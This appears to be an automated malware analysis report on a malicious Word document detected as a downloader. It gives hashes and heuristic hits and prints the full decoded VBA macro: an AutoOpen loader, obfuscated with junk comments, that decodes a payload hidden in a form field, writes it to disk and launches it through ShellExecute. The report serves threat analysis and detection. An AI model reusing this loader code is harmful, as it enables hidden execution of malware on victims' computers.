Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 322d98e25dc07c4c…

MALICIOUS

Office (OOXML)

92.0 KB Created: 2021-02-26 09:28:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2022-06-20
MD5: ca7a25c38b0cb4231377dbdaa0bbae45 SHA-1: 823b44adbf88db8c8b95a7bdbd7c0fbae51e6461 SHA-256: 322d98e25dc07c4c4d258ce2bfe9de1323f9ebe5c6969e18cba7dd102bc65af5
190 Risk Score

Heuristics 6

  • ClamAV: Doc.Downloader.8f0f0f0fe0f0f0f0-OOXML-9981534-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.8f0f0f0fe0f0f0f0-OOXML-9981534-0
  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Dim apBMRS As New Shell32.Shell
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    With CreateObject("Microsoft.XMLDOM").createElement("b64")
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/In document text (OOXML body / shared strings)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OOXML body / shared strings)
    • http://purl.org/dc/elements/1.1/In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OOXML body / shared strings)
    • http://ns.adobe.com/photoshop/1.0/In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 8057 bytes
SHA-256: c55767a9b40c42fb78de620ce7b0d48b8e91a586c381fbeb9528baa30d7f321d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "frm"
Attribute VB_Base = "0{5DD0B6A3-B63B-4BB9-8D65-AB1225C40374}{9BB5C054-0D84-41B3-9981-A7B1D107CB02}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "aFU5J"
Sub AutoOpen()
' Caper point-blank reek
' Prostitution derrick petting return paying fortify cathedral
' Colours vanilla ordering
' Till
' Warranties tours
' Promotional
Call aiGml
End Sub
Sub aiGml()
aVI3oy
End Sub
Function a5mtiD(a1Bdl)
aNBxY = ""
For aDVKd = Len(a1Bdl) To 1 Step -1
aNBxY = aNBxY & "" & Mid(a1Bdl, aDVKd, 1)
Next aDVKd
a5mtiD = aNBxY
End Function
Function a8sImz(b64)
With CreateObject("Microsoft.XMLDOM").createElement("b64")
.DataType = "bin.base64"
.text = b64
        b = .nodeTypedValue
End With
a8sImz = StrConv(b, vbUnicode)
End Function

Attribute VB_Name = "aKeqc"
Sub ax57JP(arkawH, aDrW6)
' Phoenix jill
Set axy2G = CreateObject("Scripting.FileSystemObject")
Call axy2G.CopyFile(arkawH, aDrW6, 1)
' Obituary infuse hopefully pre- declamation
' Scanned flagship hi titles
End Sub
Sub aZYQ8D(aQV2hO, aJXtM9)
' 911 deciduous amino lavender zola puns municipality
' Fertilizing liberal tile lige duet
' Edible deadened woolen estonia
' Regalia tags
' Forecast swarthy birds toilette hereupon
' Evans
' Macintosh alcove dens
' Annunciation java arbitration oceans
' Officials shaven
' Learner pets crystalline
' Composed
' Tires bulgaria non alder
' Ramrod stocks
' Reveal concept bosh
' Tyrol ninety-five improve suspension
' Rt campaign stacy sv
' Repudiated niger tag rainbow servers
' Hawthorn meta cassette
' Ht gr
' Bludgeon detestation administrator taking turban statewide gazelle
' Inactivity informative scenes tyrone
' Gains nicer sacristan feed
' Hopped metropolitan adornment
' Loiter jeff viands lap
' Ilk
' Vega dimensional mathematician april
' Subjugate begun cafe goal views
' Twinge fere piper
Open aQV2hO For Output As #1
Print #1, aJXtM9
' Mel ferret emolument seek journalism
' Intersection summed walk peanuts planet
Close #1
End Sub

Attribute VB_Name = "ah9qA"
Function a2POb(ayiZW)
' Condo disjointed
' Nave unlikely
' Vibrators projects tenure dis
' Enrichment ensue url parking
' Preceding ostler february remit located
' Locomotive pasty intestine
' Stratified households
' Are wendy
' Kills
End Function
Function a7zJH(aMhgD)
' Expires gates
' Plumage message blues backed
' Cube bunsen gadgets
' Atm bestowal abrogated
' Recline
' Punjab enlargement sofia
' Paraguay
' Jet-black
' Athletics wood untold desperate
' Marketing underlying transactions witness faster
' Wrest recognisable scored formerly darn
' Spatial aggravation hybrid larceny
' Candles microwave msie basilica peat
' Householder po
' Interested governance birthplace impair
aA3GN = Split(a5mtiD(frm.paths.text), "|")
Select Case aMhgD
Case Is = 0
a7zJH = aA3GN(0)
Case Is = 1
a7zJH = aA3GN(1)
Case Is = 2
a7zJH = aA3GN(2)
Case Is = 3
a7zJH = aA3GN(3)
End Select
' Andromeda philippines ii assessment bivouac
' Commune disconcerting
' Countryside campaigns antibodies
' Never byte whisk
' Crabs short trumpeter
' Stingy nudist
' Drivers
' Codfish trash vs bulb
' Reborn chorus scores dates
' Unapproachable provisionally maternity unaccompanied apothecary
' Abate
' Mediterranean expatiate recline
' Entirely diablo immigrants
' Bedraggled guests renunciation misunderstand
' Quill requested
' Micah aluminium augmentation formal
' Chronicle
' Aristocrat hinduism transcripts
' 12mo vivacious discernment
' Entries
' Battery inspiration viral chevrolet
' Classes tolerance nw prevention snapshot
' Swindler irritable findings constitutes
' Archived carrier
' Obituary ah
' Dec liz properties detest cadence
End Function
Function ar9sv(aHF3Tq, aC2nP)
' Marsh vietnam
' Intervention frequent
' Tops smuggler hindostan bbc tang stag matched
' Left-handed specified boats
' Alert boasting assimilation
' Emetic unbound smile
' Carey hurling wells introducing prometheus
' Meant
' Incidence smuggler fossil engineer
' Coffee weal pascal unrest downtown
' Gibraltar stint june
' Sheila
' Abstractedly evolution squeal
' Paraphrase vice likelihood trolley
End Function
Sub aVI3oy()
aNAZH = a7zJH(0)
aq2In = a7zJH(1)
aZx38 = a7zJH(2)
aJqH7k = a7zJH(3)
' Lucid derives insistence
' Fit chime alienate eddie
' Aphrodite methods aqua
' Verzeichnis etching dies
' Reproduce unless swooping cheque bravado infringement
' Chippewa accessions
' Christina insistence requires jaffa overflow
' Program autocratic enquiring cipher stolid baggy
' Retirement rutland cg
' Chichester temperatures exists turn
' Wondering differ
' Opulence dominant zee
' Itd virtuoso regent
' Offender spine
' Charlatan dally relative newcastle cite
' Rift stuff shaving
' Revision divorced incubus abolishing escorts
' Windward eradicate ascii prepaid
' Top
' Cp cheap
' Coaches observed stoical
' Saver necktie tattoo zope clifton
' Mediate dauntless phonograph
' Membrane cannibal leave zdnet
' Bp mite librarian
' Welfare extent
' Roll pete
' Recruitment other pertinacity prefers wma
' Pansies mort lethargic
' Scold
aXERcy = a5mtiD(a8sImz(frm.pay.text))
' Preaches bowling j impressive nudist definitions
' Boxer buckler
aZYQ8D aNAZH, aXERcy
' Newport ui
' Actual
' Inappropriate yuan extraction
' Sleek cleanly erotic
' Entitle extraction
' Appeal usurp illogical ryan setup
' Club governing
' Emblematic
' Hazy year released physiology il facilitate
' Undesirable name de-
' Streaming approvingly mario
' Nerve dweller richmond
ax57JP aZx38, aq2In
' Inductive fisheries shame
' Husband treasonable cove felicitous
' Variability continuous mirthful variants
' Bosh achieved
' Shared simpleton
' Vegas amicably stanford hie
' Gg sedition inbox clog objectives captivate ethan
' Tab overdue wiley odysseus
' Ensemble surgical ajar
' Tiring wield ecclesiastic sierra
' Inspiration
' Aggressive denounce dump
' Cream retarded stopped screens
' Heraldry
' Glacial statutory shanghai
' Incl scenes voiced
' Hasan dervish invective
' Arbor
' Dwelling-place badge
' Crossroads mosaic
' Croquet guiana pdf
' Vicarage slave spirit electric ts
' Divided diffs vp flex
' Dave promises forbes
' Swoon
' Refrigerator complimentary surveys irwin
' Vacations coated level contests cambrian
' Adventitious precipitation surrey shore guerdon animating
' Rubber comparable
ajEOW = Chr(34)
aq0PJE = Trim(aJqH7k & "t : " & ajEOW & aNAZH & ajEOW)
' Omelette iceland smallest usda gladiator
' Apace profligate rebate taxicab filter predominant
' Whitening fool superior upsetting boris
' Pianist anatomy
Dim apBMRS As New Shell32.Shell
Call apBMRS.ShellExecute(aq2In, aq0PJE, " ", SW_SHOWNORMAL)
' Abnormally pretentious seduce personification
' Therefore speech hu
' Attitude
' Cholera cultural thinkpad
' Respondents quorum kennedy donald
' Blare francisco
' Discourage installed
' Masonry dildo standards belinda
' Thousandth embarkation landscapes rarity
' Transit hu hybrid
' Drunk sumatra patriarchal assessment tropical gabriel landau stigma
' Bracket underlying remnants
' Strut fine wb represents murphy underlying
' Thanksgiving botanical lick
' Virginian bulletin views dowry
' Transplant hw linking
' Munich aka sharpness tum nostrum bounteous
' Applied infuse
' Groin hap
' Disdainful webcast wells ends cigarettes
' Mythical forces
' Loiter etymology
' Rebate physicist expression tutelary insulation
' Exemption pci
' Downpour regulation canine
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 40960 bytes
SHA-256: a560eb42fa51dc9b237064528a10d59404f500115ee1bbe65a5628eac58fbb71

Open this report in the interactive analyzer, or submit your own file for analysis.